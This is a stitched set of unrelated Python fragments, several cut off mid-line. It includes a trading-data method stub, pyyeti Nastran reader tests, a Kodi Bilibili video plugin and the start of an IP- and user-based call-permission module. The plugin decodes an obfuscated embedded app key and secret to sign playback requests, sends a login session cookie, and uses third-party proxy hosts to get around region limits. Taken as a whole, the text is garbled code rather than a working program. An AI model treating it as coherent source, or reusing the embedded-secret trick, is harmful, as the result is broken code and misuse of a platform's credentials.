def getHistoricalData_(self, contractFile, dateIni, dateEnd, timeframe, onlyOpen = True, timeQueue = 5, maxTimeQueue = 30) :
"""
TODO:
- Simulate the case onlyOpen = False even during days off
- Find a way to handle the case where the server responds with nothing
"""
contract = self.createContract(contractFile)
print("=================================")
print ("Get Hst Data function : ")
print("=================================")
print ("Date ini : ", dateIni,", Date end : ",dateEnd,", | |
import numpy as np
from pyyeti import ytools, nastran, locate
from pyyeti.nastran import op4, op2
from scipy.io import matlab
from nose.tools import *
def runcomp(nas, m):
matnas = m["nas"]
for name in matnas.dtype.names:
if isinstance(nas[name], dict):
for k in nas[name]:
matnas_key = "k{}".format(k)
m1 = matnas[name][0][0][matnas_key][0][0]
m2 = nas[name][k]
if name == "rfmodes" and len(m2) > 0:
m1 -= 1.0
if isinstance(m2, np.ndarray) and m2.ndim == 1:
m1 = m1.flatten()
if name == "maps" and len(m2) > 0:
m1[:, 0] -= 1
if name == "uset":
m2 = m2.reset_index().values
assert np.allclose(m1, m2)
else:
m1 = matnas[name][0][0]
m2 = nas[name]
assert np.allclose(m1, m2)
# check cstm2:
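# Each cstm2 entry is expected to be a 5x3 matrix keyed by coordinate-system id: row 0 holds the
# id and type from the corresponding cstm row, and rows 1-4 hold the remaining 12 values
# (origin plus 3x3 transform) reshaped to 4x3, which is what the comparison below reconstructs.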
for k in nas["cstm"]:
prem1 = nas["cstm2"][k]
prem2 = nas["cstm"][k]
for i, j in enumerate(prem2[:, 0]):
m1 = prem1[int(j)] # 5x3
m2 = np.zeros((5, 3))
m2[0, :2] = prem2[i, :2]
m2[1:, :] = prem2[i, 2:].reshape((4, 3))
assert np.allclose(m1, m2)
def test_n2c_csuper():
nas = op2.rdnas2cam("tests/nas2cam_csuper/nas2cam")
# nas.keys()
# dict_keys(['rfmodes', 'fgravh', 'lambda', 'phg', 'dnids', 'nrb',
# 'maps', 'kaa', 'cstm', 'maa', 'fgravg', 'uset', 'selist', 'upids',
# 'cstm2'])
m = matlab.loadmat("tests/nas2cam_csuper/nas2cam.mat")
# In [41]: m['nas'].dtype.names
# Out[41]:
# ('cstm',
# 'dnids',
# 'fgravg',
# 'fgravh',
# 'kaa',
# 'lambda',
# 'maa',
# 'maps',
# 'nrb',
# 'phg',
# 'rfmodes',
# 'selist',
# 'upids',
# 'uset')
runcomp(nas, m)
def test_n2c_extseout():
nas = op2.rdnas2cam("tests/nas2cam_extseout/nas2cam")
m = matlab.loadmat("tests/nas2cam_extseout/nas2cam.mat")
runcomp(nas, m)
def test_n2c_error():
assert_raises(
ValueError,
op2.rdnas2cam,
"tests/nas2cam_extseout/assemble.op2",
"tests/nas2cam_extseout/nas2cam.op2",
)
def test_drm12_reader():
import numpy as np
o4 = op4.OP4()
drm12 = "tests/nastran_drm12/drm12"
mats = o4.dctload(drm12 + ".op4")
dsorted = op2.procdrm12(drm12, dosort=True)
# just to exercise more code:
with op2.OP2("tests/nastran_drm12/drm12.op2") as o2:
dkeys = o2.rddrm2op2(1)
# check desc:
assert np.all(["T1", "T2", "T3"] * 3 == dsorted["DTM_desc"])
assert np.all(["T1", "T2", "T3"] * 3 == dsorted["ATM_desc"])
spcf_desc = ["Fx", "Fy", "Fz", "Mx", "My", "Mz"]
assert np.all(spcf_desc * 4 == dsorted["SPCF_desc"])
stress = [
"CBAR Bending Stress 1 - End A", # 2
"CBAR Bending Stress 2 - End A", # 3
"CBAR Bending Stress 3 - End A", # 4
"CBAR Bending Stress 4 - End A", # 5
"CBAR Axial Stress", # 6
"CBAR Max. Bend. Stress -End A", # 7
"CBAR Min. Bend. Stress -End A", # 8
"CBAR M.S. Tension", # 9
"CBAR Bending Stress 1 - End B", # 10
"CBAR Bending Stress 2 - End B", # 11
"CBAR Bending Stress 3 - End B", # 12
"CBAR Bending Stress 4 - End B", # 13
"CBAR Max. Bend. Stress -End B", # 14
"CBAR Min. Bend. Stress -End B", # 15
"CBAR M.S. Compression",
] # 16
assert np.all(stress * 2 == dsorted["STM_desc"])
force = [
"CBAR Bending Moment 1 - End A", # 2
"CBAR Bending Moment 2 - End A", # 3
"CBAR Bending Moment 1 - End B", # 4
"CBAR Bending Moment 2 - End B", # 5
"CBAR Shear 1", # 6
"CBAR Shear 2", # 7
"CBAR Axial Force", # 8
"CBAR Torque",
] # 9
assert np.all(force * 2 + force[-2:] == dsorted["LTM_desc"])
# check id_dof:
ids = np.array([[12] * 3, [14] * 3, [32] * 3]).reshape((1, -1)).T
dof = np.array([[1, 2, 3] * 3]).T
iddof = np.hstack((ids, dof))
assert np.all(iddof == dsorted["DTM_id_dof"])
assert np.all(iddof == dsorted["ATM_id_dof"])
ids = np.array([[3] * 6, [11] * 6, [19] * 6, [27] * 6]).reshape((1, -1)).T
dof = np.array([[1, 2, 3, 4, 5, 6] * 4]).T
iddof = np.hstack((ids, dof))
assert np.all(iddof == dsorted["SPCF_id_dof"])
ids = np.array([[11] * 15, [89] * 15]).reshape((1, -1)).T
dof = np.array([[i for i in range(2, 17)] * 2]).T
iddof = np.hstack((ids, dof))
assert np.all(iddof == dsorted["STM_id_dof"])
ids = np.array([[11] * 8 + [23] * 8 + [28] * 2]).reshape((1, -1)).T
dof = np.array([[i for i in range(2, 10)] * 2 + [8, 9]]).T
iddof = np.hstack((ids, dof))
assert np.all(iddof == dsorted["LTM_id_dof"])
# check drms:
# manually getting rows from TOUGV1, etc in .out file:
rows = np.array([13, 14, 15, 19, 20, 21, 49, 50, 51]) - 1
assert np.all(mats["mougs1"][0][rows] == dsorted["DTMD"])
assert np.all(mats["mougd1"][0][rows] == dsorted["DTMA"])
assert np.all(mats["mougv1"][0][rows] == dsorted["ATM"])
assert np.all(mats["moqgs1"][0] == dsorted["SPCFD"])
assert np.all(mats["moqgd1"][0] == dsorted["SPCFA"])
rows = np.array([i for i in range(1, 17)] + [23, 24]) - 1
assert np.all(mats["moefs1"][0][rows] == dsorted["LTMD"])
assert np.all(mats["moefd1"][0][rows] == dsorted["LTMA"])
assert np.all(mats["moess1"][0] == dsorted["STMD"])
assert np.all(mats["moesd1"][0] == dsorted["STMA"])
draw = op2.procdrm12(drm12, dosort=False)
# check desc:
assert np.all(["T1", "T2", "T3"] * 3 == draw["DTM_desc"])
assert np.all(["T3", "T1", "T2"] + ["T1", "T2", "T3"] * 2 == draw["ATM_desc"])
spcf_desc = ["Fx", "Fy", "Fz", "Mx", "My", "Mz"]
assert np.all(spcf_desc * 4 == draw["SPCF_desc"])
stress = [
"CBAR Bending Stress 1 - End A", # 2
"CBAR Bending Stress 2 - End A", # 3
"CBAR Bending Stress 3 - End A", # 4
"CBAR Bending Stress 4 - End A", # 5
"CBAR Axial Stress", # 6
"CBAR Max. Bend. Stress -End A", # 7
"CBAR Min. Bend. Stress -End A", # 8
"CBAR M.S. Tension", # 9
"CBAR Bending Stress 1 - End B", # 10
"CBAR Bending Stress 2 - End B", # 11
"CBAR Bending Stress 3 - End B", # 12
"CBAR Bending Stress 4 - End B", # 13
"CBAR Max. Bend. Stress -End B", # 14
"CBAR Min. Bend. Stress -End B", # 15
"CBAR M.S. Compression",
] # 16
assert np.all(stress * 2 == draw["STM_desc"])
force = [
"CBAR Bending Moment 1 - End A", # 2
"CBAR Bending Moment 2 - End A", # 3
"CBAR Bending Moment 1 - End B", # 4
"CBAR Bending Moment 2 - End B", # 5
"CBAR Shear 1", # 6
"CBAR Shear 2", # 7
"CBAR Axial Force", # 8
"CBAR Torque",
] # 9
assert np.all(force + force[-1:] + force[-2:-1] + force == draw["LTM_desc"])
# check id_dof:
ids = np.array([[14] * 3, [12] * 3, [32] * 3]).reshape((1, -1)).T
dof = np.array([[1, 2, 3] * 3]).T
iddof = np.hstack((ids, dof))
assert np.all(iddof == draw["DTM_id_dof"])
dof = np.array([[3, 1, 2] + [1, 2, 3] * 2]).T
iddof = np.hstack((ids, dof))
assert np.all(iddof == draw["ATM_id_dof"])
ids = np.array([[3] * 6, [11] * 6, [19] * 6, [27] * 6]).reshape((1, -1)).T
dof = np.array([[1, 2, 3, 4, 5, 6] * 4]).T
iddof = np.hstack((ids, dof))
assert np.all(iddof == draw["SPCF_id_dof"])
ids = np.array([[89] * 15, [11] * 15]).reshape((1, -1)).T
dof = np.array([[i for i in range(2, 17)] * 2]).T
iddof = np.hstack((ids, dof))
assert np.all(iddof == draw["STM_id_dof"])
ids = np.array([[23] * 8 + [28] * 2 + [11] * 8]).reshape((1, -1)).T
dof = np.array([[i for i in range(2, 10)] + [9, 8] + [i for i in range(2, 10)]]).T
iddof = np.hstack((ids, dof))
assert np.all(iddof == draw["LTM_id_dof"])
# check drms:
# manually getting rows from TOUGV1, etc in .out file:
rows = np.array([19, 20, 21, 13, 14, 15, 49, 50, 51]) - 1
assert np.all(mats["mougs1"][0][rows] == draw["DTMD"])
assert np.all(mats["mougd1"][0][rows] == draw["DTMA"])
rows = np.array([21, 19, 20, 13, 14, 15, 49, 50, 51]) - 1
assert np.all(mats["mougv1"][0][rows] == draw["ATM"])
assert np.all(mats["moqgs1"][0] == draw["SPCFD"])
assert np.all(mats["moqgd1"][0] == draw["SPCFA"])
rows = np.array([9, 10, 11, 12, 13, 14, 15, 16, 24, 23, 1, 2, 3, 4, 5, 6, 7, 8]) - 1
assert np.all(mats["moefs1"][0][rows] == draw["LTMD"])
assert np.all(mats["moefd1"][0][rows] == draw["LTMA"])
rows = np.array([i for i in range(16, 31)] + [i for i in range(1, 16)]) - 1
assert np.all(mats["moess1"][0][rows] == draw["STMD"])
assert np.all(mats["moesd1"][0][rows] == draw["STMA"])
def test_codefuncs():
import sys
for v in list(sys.modules.values()):
if getattr(v, "__warningregistry__", None):
v.__warningregistry__ = {}
with op2.OP2("tests/nastran_drm12/drm12.op2") as o:
assert o.CodeFuncs[1](7) == 1
assert o.CodeFuncs[1](3002) == 2
assert o.CodeFuncs[2](123) == 23
assert o.CodeFuncs[3](123) == 123
assert o.CodeFuncs[4](22) == 2
assert o.CodeFuncs[5](15) == 5
assert o.CodeFuncs[6](8) == 0
assert o.CodeFuncs[6](9) == 0
assert o.CodeFuncs[6](7) == 1
assert o.CodeFuncs[7](222) == 0
assert o.CodeFuncs[7](2222) == 0
assert o.CodeFuncs[7](1222) == 1
assert o.CodeFuncs[7](3222) == 1
assert o.CodeFuncs[7](5222) == 2
funccode = 123456
val = 18 & (funccode & 65535)
assert o.CodeFuncs["big"](funccode, 18) == val
assert o._check_code(22, [4], [[2]], "test")
| |
rtext.find(';(function(){var s')
vjson = rtext[str1+25:str2]
j = json.loads(vjson)
elist = j['epList']
aid = ''
for index in range(len(elist)):
if int(elist[index]['id']) == int(epid):
aid = elist[index]['aid']
if aid == '':
slist = j['sections']
if slist != []:
for index in range(len(slist)):
##
sslist = slist[index]['epList']
for i in range(len(sslist)):
if int(sslist[i]['id']) == int(epid):
aid = sslist[i]['aid']
if aid == '':
dialog = xbmcgui.Dialog()
#dialog.textviewer('tt',epid)
if ifvideourl != None:
bvid = re.search(r'BV[a-zA-Z0-9]+', url)
bvurl = 'https://api.bilibili.com/x/web-interface/view?bvid='+bvid.group()
r = requests.get(bvurl,headers=headers)
j = json.loads(r.text)
aid = j['data']['aid']
mid = j['data']['owner']['mid']
#apiurl = 'http://api.bilibili.com/x/reply?type=1&oid='+str(aid)+'&sort=' + sort
apiurl = 'https://api.bilibili.com/x/v2/reply?jsonp=jsonp&pn=1&type=1&oid='+str(aid)+'&sort=' + sort
apiheaders = {'user-agent' : 'Mozilla/5.0 (Linux; Android 10; Z832 Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Mobile Safari/537.36','referer':'https://www.bilibili.com/video/BV1Ze411W7EL'}
r = requests.get(apiurl,headers=apiheaders)
j = json.loads(r.text)
rep = j['data']['replies']
text = ''
for index in range(len(rep)):
text += '-----'*12 +'\n'
# Timestamp handling
ctime = int(rep[index]['ctime'])
# Convert to local time
time_local = time.localtime(ctime)
# Convert to the new time format (e.g. 2016-05-05 20:28:54)
ctime = time.strftime("%Y-%m-%d %H:%M:%S",time_local)
# Check for premium ("big VIP") membership
if rep[index]['member']['vip']['vipType'] == 2:
# Premium member: show the username in pink
text += '[COLOR pink]' + rep[index]['member']['uname'].encode('utf-8') + '[/COLOR]'
else:
text += rep[index]['member']['uname'].encode('utf-8')
# Append the user-level suffix
text += level_color(rep[index]['member']['level_info']['current_level'])
# Check whether the commenter is the uploader
if ifvideourl != None:
if int(mid) == int(rep[index]['member']['mid']):
text += ' [COLOR pink][UP主][/COLOR]'
text += '\n'
text += rep[index]['content']['message'].encode('utf-8') +'\n'
text += str(ctime) + ' · ' + str(rep[index]['like']) + '赞 · 共' + str(rep[index]['count']) +'条回复\n'
rrep = rep[index]['replies']
text += '-----'*12 +'\n\n'
if rrep:
for i in range(len(rrep)):
# Timestamp handling
ctime = int(rrep[i]['ctime'])
# Convert to local time
time_local = time.localtime(ctime)
# Convert to the new time format (e.g. 2016-05-05 20:28:54)
ctime = time.strftime("%Y-%m-%d %H:%M:%S",time_local)
if rrep[i]['member']['vip']['vipType'] == 2:
# Premium member
text += ' '*5 + '[COLOR pink]' + rrep[i]['member']['uname'].encode('utf-8') + '[/COLOR]'
else:
text += ' '*5 + rrep[i]['member']['uname'].encode('utf-8')
# Append the user-level suffix
text += level_color(rrep[i]['member']['level_info']['current_level'])
# Check whether the reply author is the uploader
if ifvideourl != None:
if int(mid) == int(rrep[i]['member']['mid']):
text += ' [COLOR pink][UP主][/COLOR]'
text += '\n'
text += ' '*5 + rrep[i]['content']['message'].encode('utf-8') +'\n'
text += ' '*5 + str(ctime) + ' · ' + str(rrep[i]['like']) + '赞 · 共' + str(rrep[i]['count']) +'条回复\n'
if len(rrep)-1 != i:
text += ' '*5 + '-----'*10 +'\n'
return text
@plugin.cached(TTL=60)
def get_bangumijson(url):
cutep = url.find('y/ep')
epnum = url[cutep+4:]
epnum = re.sub(r'\D','',epnum)
apiurl = 'https://api.bilibili.com/pgc/player/web/playurl/html5?ep_id='
rec = requests.get(apiurl+epnum,headers=mheaders)
#rec.encoding = 'utf-8'
rectext = rec.text
rectext = rectext.encode('utf-8')
j = json.loads(rec.text)
return j
@plugin.cached(TTL=10)
def get_api1(url,quality):
if re.search(r'[Bb]{1}[Vv]{1}[a-zA-Z0-9]+', url):
bvid = re.search(r'[Bb]{1}[Vv]{1}[a-zA-Z0-9]+', url)
vurl = 'https://api.bilibili.com/x/web-interface/view?bvid='+bvid.group()
if re.search('[aA]{1}[vV]{1}[0-9]+', url):
aid = re.search(r'[aA]{1}[vV]{1}[0-9]+', url)
aid = aid.group()
aid = aid[2:]
vurl = 'https://api.bilibili.com/x/web-interface/view?aid='+aid
if '?p=' in url:
# Download a single part of a multi-part video
p = int(re.search(r'\?p=(\d+)',url).group(1)) -1
else:
p = 0
r = requests.get(vurl,headers=headers)
j = json.loads(r.text)
cid = j['data']['pages'][int(p)]['cid']
danmuku.Danmuku(cid)
print(cid)
entropy = 'rbMCKn@KuamXWlPMoJGsKcbiJKUfkPF_8dABscJntvqhRSETg'
appkey, sec = ''.join([chr(ord(i) + 2) for i in entropy[::-1]]).split(':')
params = 'appkey=%s&cid=%s&otype=json&qn=%s&quality=%s&type=' % (appkey, cid, quality, quality)
tmp = params + sec
tmp = tmp.encode('utf-8')
chksum = hashlib.md5(bytes(tmp)).hexdigest()
url_api = 'https://interface.bilibili.com/v2/playurl?%s&sign=%s' % (params, chksum)
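# The request is signed by appending sign=md5(query_string + secret); appkey and the secret are
# recovered above by reversing the obfuscated 'entropy' string and shifting every character by +2
# before splitting on ':'.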
apiheaders = {
'Referer': url,
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'
}
# print(url_api)
html = requests.get(url_api, headers=apiheaders).json()
# print(json.dumps(html))
video_list = []
for i in html['durl']:
video_list.append(i['url'])
# print(video_list)
return video_list
@plugin.cached(TTL=10)
def get_api2(url):
mp4 = ''
if re.match('https://',url) == None:
if re.match('http://',url) != None:
url = 'https://'+url[7:]
else:
dialog = xbmcgui.Dialog()
ok = dialog.ok('错误提示', '非法url')
ifvideourl = re.match('https://www.bilibili.com/video/',url)
if ifvideourl != None:
bvid = ''
aid = ''
if re.search(r'[Bb]{1}[Vv]{1}[a-zA-Z0-9]+', url):
bvid = re.search(r'[Bb]{1}[Vv]{1}[a-zA-Z0-9]+', url)
bvid = bvid.group()
vurl = 'https://api.bilibili.com/x/web-interface/view?bvid='+bvid
if re.search('[aA]{1}[vV]{1}[0-9]+', url):
aid = re.search(r'[aA]{1}[vV]{1}[0-9]+', url)
aid = aid.group()
aid = aid[2:]
vurl = 'https://api.bilibili.com/x/web-interface/view?aid='+aid
r = requests.get(vurl,headers=headers)
j = json.loads(r.text)
aid = j['data']['aid']
if '?p=' in url:
# Download a single part of a multi-part video
p = int(re.search(r'\?p=(\d+)',url).group(1)) -1
else:
p = 0
cid = j['data']['pages'][p]['cid']
danmuku.Danmuku(cid)
apiurl = 'https://www.xbeibeix.com/api/bilibiliapi.php?url=https://www.bilibili.com/&aid='+str(aid)+'&cid=' + str(cid)
r = requests.get(apiurl,headers=headers)
j = json.loads(r.text)
if str(j['url']) != 'null':
mp4 = j['url']
dialog = xbmcgui.Dialog()
dialog.textviewer('错误提示', str(mp4))
else:
dialog = xbmcgui.Dialog()
ok = dialog.ok('错误提示', '视频不存在')
else:
dialog = xbmcgui.Dialog()
ok = dialog.ok('错误提示', '不支持的url格式')
return mp4
@plugin.cached(TTL=10)
def get_api3(url, quality):
if re.match('https://',url) == None:
if re.match('http://',url) != None:
url = 'https://'+url[7:]
else:
dialog = xbmcgui.Dialog()
ok = dialog.ok('错误提示', '非法url')
ifbangumiurl = re.match('https://www.bilibili.com/bangumi/play/ep',url)
ifvideourl = re.match('https://www.bilibili.com/video/',url)
if ifbangumiurl or ifvideourl != None:
if ifbangumiurl != None:
epid = re.search(r'ep[0-9]+', url)
epid = epid.group()
epid = epid[2:]
r = requests.get(url,headers=headers)
rtext = r.text
str1 = rtext.find('window.__INITIAL_STATE__=')
str2 = rtext.find(';(function(){var s')
vjson = rtext[str1+25:str2]
j = json.loads(vjson)
elist = j['epList']
bvid = ''
cid = ''
for index in range(len(elist)):
if int(elist[index]['id']) == int(epid):
bvid = elist[index]['bvid']
cid = elist[index]['cid']
if bvid == '' or cid == '':
slist = j['sections']
if slist != []:
for index in range(len(slist)):
##
sslist = slist[index]['epList']
for i in range(len(sslist)):
if int(sslist[i]['id']) == int(epid):
bvid = sslist[i]['bvid']
cid = sslist[i]['cid']
if bvid == '' or cid == '':
dialog = xbmcgui.Dialog()
#dialog.textviewer('tt',epid)
if ifvideourl != None:
bvid = ''
aid = ''
if re.search(r'[Bb]{1}[Vv]{1}[a-zA-Z0-9]+', url):
bvid = re.search(r'[Bb]{1}[Vv]{1}[a-zA-Z0-9]+', url)
bvid = bvid.group()
vurl = 'https://api.bilibili.com/x/web-interface/view?bvid='+bvid
if re.search('[aA]{1}[vV]{1}[0-9]+', url):
aid = re.search(r'[aA]{1}[vV]{1}[0-9]+', url)
aid = aid.group()
aid = aid[2:]
vurl = 'https://api.bilibili.com/x/web-interface/view?aid='+aid
r = requests.get(vurl,headers=headers)
j = json.loads(r.text)
#bvid = j['data']['pages'][0]['bvid']
if '?p=' in url:
# Download a single part of a multi-part video
p = int(re.search(r'\?p=(\d+)',url).group(1)) -1
else:
p = 0
cid = j['data']['pages'][p]['cid']
danmuku.Danmuku(cid)
if bvid != '':
url_api = 'https://api.bilibili.com/x/player/playurl?cid={}&bvid={}&qn={}'.format(cid, bvid, quality)
else:
url_api = 'https://api.bilibili.com/x/player/playurl?cid={}&aid={}&qn={}'.format(cid, aid, quality)
apiheaders = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
'Cookie': sessdata(), # SESSDATA field copied from the cookie after logging in to Bilibili; valid for about one month
'Host': 'api.bilibili.com'
}
html = requests.get(url_api, headers=apiheaders).json()
video_list = []
#dialog = xbmcgui.Dialog()
#dialog.textviewer('评论区',str(html['data']['durl']))
if 'data' in html:
for i in html['data']['durl']:
video_list.append(i['url'])
else:
dialog = xbmcgui.Dialog()
dialog.ok('提示','无法解析视频')
return video_list
@plugin.cached(TTL=10)
def get_api4(url,quality):
epid = re.search(r'ep[0-9]+', url)
epid = epid.group()
epid = epid[2:]
r = requests.get(url,headers=headers)
rtext = r.text
str1 = rtext.find('window.__INITIAL_STATE__=')
str2 = rtext.find(';(function(){var s')
vjson = rtext[str1+25:str2]
j = json.loads(vjson)
elist = j['epList']
bvid = ''
cid = ''
for index in range(len(elist)):
if int(elist[index]['id']) == int(epid):
bvid = elist[index]['bvid']
cid = elist[index]['cid']
if bvid == '' or cid == '':
slist = j['sections']
if slist != []:
for index in range(len(slist)):
##
sslist = slist[index]['epList']
for i in range(len(sslist)):
if int(sslist[i]['id']) == int(epid):
bvid = sslist[i]['bvid']
cid = sslist[i]['cid']
if bvid == '' or cid == '':
dialog = xbmcgui.Dialog()
#dialog.textviewer('tt',epid)
#hk9ho2af5hdw20wewf4ahqovwp79kq2z
#https://www.biliplus.com/BPplayurl.php?cid=181007115&bvid=BV1fK4y1r7sT&qn=80&module=bangumi&otype=json
url_api = 'https://www.biliplus.com/BPplayurl.php?cid={}&qn={}&module=bangumi&otype=json&bvid={}'.format(cid,quality,bvid)
danmuku.Danmuku(cid)
r = requests.get(url_api, headers=headers)
html = json.loads(r.text)
#video_list = []
# if 'durl' in html:
# videolist = []
# for i in html['durl']:
# videolist.append(i['url'])
# #video_list = video_list[0]
# if 'dash' in html:
# videolist = {}
# videolist['video'] = html['dash']['video'][0]['base_url']
# videolist['audio'] = html['dash']['audio'][0]['base_url']
# #video_list = video_list[0]
#dialog = xbmcgui.Dialog()
#dialog.textviewer('评论区',str(html))
video_list = []
if 'durl' in html:
for i in range(len(html['durl'])):
video_list.append(html['durl'][i]['url'])
#video_list = video_list[0]
else:
dialog = xbmcgui.Dialog()
dialog.ok('提示','无法解析视频')
#dialog = xbmcgui.Dialog()
#dialog.textviewer('评论区',str(video_list))
return video_list
@plugin.cached(TTL=10)
def get_api5(url,quality,api):
epid = re.search(r'ep[0-9]+', url)
epid = epid.group()
epid = epid[2:]
r = requests.get(url,headers=headers)
rtext = r.text
str1 = rtext.find('window.__INITIAL_STATE__=')
str2 = rtext.find(';(function(){var s')
vjson = rtext[str1+25:str2]
j = json.loads(vjson)
elist = j['epList']
bvid = ''
cid = ''
for index in range(len(elist)):
if int(elist[index]['id']) == int(epid):
bvid = elist[index]['bvid']
cid = elist[index]['cid']
if bvid == '' or cid == '':
slist = j['sections']
if slist != []:
for index in range(len(slist)):
##
sslist = slist[index]['epList']
for i in range(len(sslist)):
if int(sslist[i]['id']) == int(epid):
bvid = sslist[i]['bvid']
cid = sslist[i]['cid']
if bvid == '' or cid == '':
dialog = xbmcgui.Dialog()
#dialog.textviewer('tt',epid)
if int(api) == 1:
apihead = 'https://bilibili-tw-api.kghost.info/'
if int(api) == 2:
apihead = 'https://bilibili-hk-api.kghost.info/'
url_api = apihead + 'x/player/playurl?cid={}&bvid={}&qn={}'.format(cid, bvid, quality)
danmuku.Danmuku(cid)
apiheaders = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
#'Cookie': sessdata, # SESSDATA field copied from the cookie after logging in to Bilibili; valid for about one month
#'Host': 'api.bilibili.com'
}
html = requests.get(url_api, headers=apiheaders).json()
video_list = []
#dialog = xbmcgui.Dialog()
#dialog.textviewer('评论区',str(html))
if html['data']:
for i in html['data']['durl']:
video_list.append(i['url'])
video_list = video_list[0]
else:
dialog = xbmcgui.Dialog()
dialog.ok('提示','无法解析视频')
return video_list
@plugin.cached(TTL=10)
def get_live(page):
videos = []
r = requests.get('https://api.live.bilibili.com/room/v1/room/get_user_recommend?page=' +str(page), headers=headers)
r.encoding = 'UTF-8'
j = json.loads(r.text)
llist = j['data']
for index in range(len(llist)):
videoitem = {}
videoitem['name'] = llist[index]['title']
videoitem['href']
| |
# MIT License
#
# Copyright (c) 2022 <NAME> [srccircumflex]
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
from ast import literal_eval
from calendar import timegm
from os import access, makedirs
from os import path as os_path
from re import escape, findall, search, sub
from time import gmtime, strftime, strptime, time
from functools import lru_cache
from _rc import configurations as CNF
from sec.fTools import DefIfEndIf, subwinpath
from sec.Proto import StreamHeader, ParseStreamHeader, pm
from sec.Loggers import LOGS_, log_bad_data
from sec.vTools import mk_login, _rcUDELUser, _rcDELUser
from sec.fscModule import FStreamCipher
def ip_rex(ip:str) -> str: return '^' + sub(
'(\.0$|\\\.0$)', '\\.[0-9]+', sub(
'(\.0\.|\\\.0\.)','\\.[0-9]+\\.', sub(
'(\.0\.|\\\.0\.)','\\.[0-9]+\\.',sub(
'^0\.', '[0-9]+\\.', ip)))) + '$'
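# For example, ip_rex("192.168.0.0") yields roughly "^192.168\.[0-9]+\.[0-9]+$", so a zero octet
# in a configured address acts as a wildcard for that octet when matching client IPs.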
class SecureCall:
call_cache: dict = dict()
def __init__(self, client_set):
self.NONE_ACCEPTS: set = {
pm._port_ping, pm._port_pong,
pm._login_ping, pm._login_pong,
pm._pair
}
self.HOST_DROP: set = {
pm._port_pong,
pm._login_pong,
pm._w_conf,
}
self.CLIENT_DROP: set = {
pm._port_ping,
pm._login_ping
}
self._MAP = {CNF.CLIENT_SIDE: self.CLIENT_DROP, CNF.HOST_SIDE: self.HOST_DROP}
self._defifendifSC = DefIfEndIf(CNF.BOARD_CALL_RULE, *CNF.IFDEFENDIF['BOARD_CALL_RULE'])
self._delim = b'\\\\'
self._client_cache:dict = None
self._client_set:set = client_set
self._none_accept = b'(' + bytes().join(
[b'^' + n + b'$|' for n in self.NONE_ACCEPTS]
)[:-1] + b')'
self.drop = b'(' + bytes().join(
[b'^' + n + b'$|' for n in self._MAP[True]]
)[:-1] + b')'
__ol = None
@lru_cache(20)
def _read_rule(self, user:str, __m:bytes, __el:bytes) -> bool:
if CNF.CLIENT_SIDE: return True
if not self._defifendifSC.configured:
if user:
LOGS_.blackbox.logg(30, CNF.STRINGS.ENDIF % 'BOARD_CALL_RULE', ip=user, ico=CNF.PRINT_ICOS.rc, ansi=CNF.MSG_ANSI.yellow, mt=self._read_rule)
return True
_rrc = self._defifendifSC.read_rc()
_configured = False
try:
while True:
ln = next(_rrc)
delim_splt = (ln.strip() + b' ').split(self._delim)
if len(delim_splt) < 2: continue
if ln.split()[0] != user.encode(CNF.LOC_ENC): continue
_configured = True
for ip in delim_splt[0].decode(CNF.LOC_ENC).split()[1:]:
if search(ip_rex(ip), self._client_set.copy().pop()[0]):
if search(b' ' + __m + b' ', delim_splt[1]): raise PermissionError
if not self.call_cache.get(user):
limitations = findall(__m + b'\[[0-9]+]', delim_splt[1])
for limited in limitations:
self.call_cache.setdefault(user, dict())
self.call_cache[user].setdefault(
__m.decode(CNF.LOC_ENC), [int(sub(__m + b'\[|]', b'', limited)),0])
distinct = findall(__m + b'\([^(]*\)', delim_splt[1])
for dist in distinct:
args = sub(__m + b'\(|\)| ', b'', dist).split(b';')
for arg in args:
_key, _val = arg.split(b':')
key, val = _key.decode(CNF.LOC_ENC), _val.decode(CNF.LOC_ENC)
if key in self.__ol:
if val.startswith('<'):
val = int(val.replace('<', '').replace('.', ''))
if self.__ol[key] < val: raise PermissionError
elif val.startswith('>'):
val = int(val.replace('>', '').replace('.', ''))
if self.__ol[key] > val: raise PermissionError
elif search("[" + val + "]", self.__ol[key]): raise PermissionError
raise EOFError
raise PermissionError
except StopIteration:
return True
except PermissionError:
_rrc.close()
return False
except EOFError:
_rrc.close()
return True
finally:
if not _configured and user:
LOGS_.blackbox.logg(30, CNF.STRINGS.ENDIF % 'BOARD_CALL_RULE', ip=user, ico=CNF.PRINT_ICOS.rc, ansi=CNF.MSG_ANSI.yellow, mt=self._read_rule)
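# Rough BOARD_CALL_RULE line format as inferred from the parser above (an assumption, not an
# authoritative spec):
#   <user> <ip-pattern> [<ip-pattern> ...] \\ <denied method> <method>[<call limit>] <method>(opt:val;...)
# A method listed plainly after the '\\' delimiter is denied outright, '[n]' caps the number of
# calls, and '(key:val;...)' entries define denial conditions on header options.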
def wrapper_call__(self, clear_cache:bool=False):
wrapper_info = self._read_rule.cache_info()
_info = f"({wrapper_info=},{self.call_cache=})"
if clear_cache:
self._read_rule.cache_clear()
self.call_cache.clear()
return _info
def call(self, __header:[StreamHeader, ParseStreamHeader], __o, **kwargs):
ip = self._client_set.copy().pop()[0]
